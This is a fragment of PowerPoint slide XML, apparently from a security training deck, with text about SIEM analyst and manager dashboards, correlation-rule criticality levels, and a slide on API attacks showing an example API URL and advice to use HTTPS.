                  <a:lnTo>
                    <a:pt x="11634" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333204" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380999" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761999" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380999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6526783" y="4984825"/>
            <a:ext cx="18542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83001" y="4420997"/>
            <a:ext cx="3301365" cy="15557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 indent="635">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="105" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Analyst </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="114" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>dashboard </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="120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Console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alerts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that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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require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prioritization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investigation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311510" y="4638192"/>
            <a:ext cx="3172460" cy="79057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189230">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="155" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-120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14" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>dashboard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Overall</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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status</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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indicators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15200" y="4427220"/>
            <a:ext cx="1600200" cy="160019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66691" y="306451"/>
            <a:ext cx="772160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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Programming</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-2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14">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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00782" y="1882292"/>
            <a:ext cx="11854180" cy="18224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14999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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API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must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only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used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over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encrypted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channel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(HTTPS).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This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because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API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calls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over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plain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HTTP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not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secure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could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easily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impersonated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modified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by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third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party.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35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</a:pP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API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call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might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use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following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general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URL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format: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0632" y="760476"/>
            <a:ext cx="10692384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753611" y="4421123"/>
            <a:ext cx="8677910" cy="3112135"/>
            <a:chOff x="3753611" y="4421123"/>
            <a:chExt cx="8677910" cy="311213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25239" y="4421123"/>
              <a:ext cx="8606027" cy="31120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53611" y="4989575"/>
              <a:ext cx="8360664" cy="170078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877055" y="4471415"/>
              <a:ext cx="8481060" cy="2988945"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8481060" h="2988945">
                  <a:moveTo>
                    <a:pt x="8481060" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8481060" y="2988563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8481060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877055" y="4471415"/>
              <a:ext cx="8481060" cy="2988945"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8481060" h="2988945">
                  <a:moveTo>
                    <a:pt x="0" y="2988563"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8481060" y="2988563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8481060" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988563"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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3955541" y="5075047"/>
            <a:ext cx="7931150" cy="136017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10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>https://webapp.xyz/? </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Action=RunInstance&amp;Id=123&amp;Count=1&amp;Instance </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>AccessKey=MyInstanceAccessKey&amp;Placement=useast&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1310">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>MyAuthorizationToken</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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813047" y="4226001"/>
            <a:ext cx="8632190" cy="3377565"/>
            <a:chOff x="3813047" y="4226001"/>
            <a:chExt cx="8632190" cy="337756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13047" y="4226001"/>
              <a:ext cx="8631936" cy="44810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858767" y="4271772"/>
              <a:ext cx="8517890" cy="334010"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8517890" h="334010">
                  <a:moveTo>
                    <a:pt x="8426069" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="91567" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55935" y="7199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26828" y="26828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7199" y="55935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="333755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8517636" y="333755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8517636" y="91566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8510436" y="55935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8490807" y="26828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8461700" y="7199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8426069" y="0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3047" y="7414298"/>
              <a:ext cx="8631936" cy="18893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858767" y="7459980"/>
              <a:ext cx="8517890" cy="74930"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8517890" h="74929">
                  <a:moveTo>
                    <a:pt x="8517636" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="74676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8517636" y="74676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8517636" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D3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92316" y="306451"/>
            <a:ext cx="30714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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIEM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="165">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dashboards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96940" y="760476"/>
            <a:ext cx="4247388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7189" y="1756298"/>
            <a:ext cx="9417050" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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correlation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rules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assign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level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criticality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each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evidence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match.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3810">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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Various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levels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criticality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are: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744391" y="3948271"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="3744391" y="3948271"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3744391" y="3948271"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704339" h="1721485">
                  <a:moveTo>
                    <a:pt x="838475" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791541" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745123" y="7450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699307" y="14923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654179" y="24817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609823" y="37077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566326" y="51645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523773" y="68464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482249" y="87478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441840" y="108629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402632" y="131861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364710" y="157116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328159" y="184338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293065" y="213470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259514" y="244454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227590" y="277235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197381" y="311754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168970" y="347956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142444" y="385783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117888" y="425178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95388" y="466084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75028" y="508444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56896" y="552202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41075" y="597301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27653" y="643683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16713" y="691292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8445" y="739436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941" y="787406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="835116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2448" y="929415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7433" y="975833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14898" y="1021649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24787" y="1066778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37041" y="1111133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51604" y="1154630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68420" y="1197184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87431" y="1238707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108580" y="1279116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131811" y="1318324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157066" y="1356247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184289" y="1392798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213423" y="1427892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244410" y="1461443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277194" y="1493366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311718" y="1523576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347925" y="1551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385758" y="1578513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425160" y="1603069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466075" y="1625569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508444" y="1645928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552212" y="1664061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597322" y="1679881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643716" y="1693304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691337" y="1704244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739481" y="1712512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787451" y="1718016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835162" y="1720812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882527" y="1720957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929461" y="1718509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975879" y="1713523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021694" y="1706058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066823" y="1696170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111178" y="1683916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154676" y="1669352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197229" y="1652537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238753" y="1633526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279161" y="1612376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318370" y="1589145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356292" y="1563890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392843" y="1536667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427937" y="1507534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461488" y="1476546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493411" y="1443762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523621" y="1409238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552032" y="1373031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578558" y="1335198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603114" y="1295796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625614" y="1254882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645973" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664106" y="1168744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679927" y="1123635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693349" y="1077241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704289" y="1029620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860501" y="860456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029665" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981520" y="8412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933550" y="2920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885840" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838475" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0ECFE8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904488" y="4108703"/>
              <a:ext cx="1400810" cy="1400810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400810" h="1400810">
                  <a:moveTo>
                    <a:pt x="700277" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="652337" y="1615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605262" y="6393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559158" y="14228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514129" y="25017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470279" y="38654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427714" y="55036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386536" y="74058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346851" y="95616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308762" y="119606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272375" y="145923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237793" y="174462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205120" y="205120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174462" y="237793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145923" y="272375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119606" y="308762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95616" y="346851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74058" y="386536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55036" y="427714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38654" y="470279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25017" y="514129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14228" y="559158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6393" y="605262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615" y="652337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="700278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615" y="748218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6393" y="795293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14228" y="841397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25017" y="886426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38654" y="930276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55036" y="972841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74058" y="1014019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95616" y="1053704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119606" y="1091793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145923" y="1128180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174462" y="1162762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205120" y="1195435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237793" y="1226093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272375" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308762" y="1280949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346851" y="1304939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386536" y="1326497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427714" y="1345519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470279" y="1361901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514129" y="1375538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559158" y="1386327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605262" y="1394162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652337" y="1398940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700277" y="1400556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748218" y="1398940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795293" y="1394162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841397" y="1386327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886426" y="1375538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930276" y="1361901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972841" y="1345519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014019" y="1326497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053704" y="1304939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091793" y="1280949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128180" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162762" y="1226093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195435" y="1195435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226093" y="1162762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1254632" y="1128180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280949" y="1091793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304939" y="1053704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326497" y="1014019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345519" y="972841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361901" y="930276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375538" y="886426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386327" y="841397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394162" y="795293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398940" y="748218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400556" y="700278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398940" y="652337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394162" y="605262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386327" y="559158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375538" y="514129"/>
                  </a:lnTo>
                  <a:lnTo>
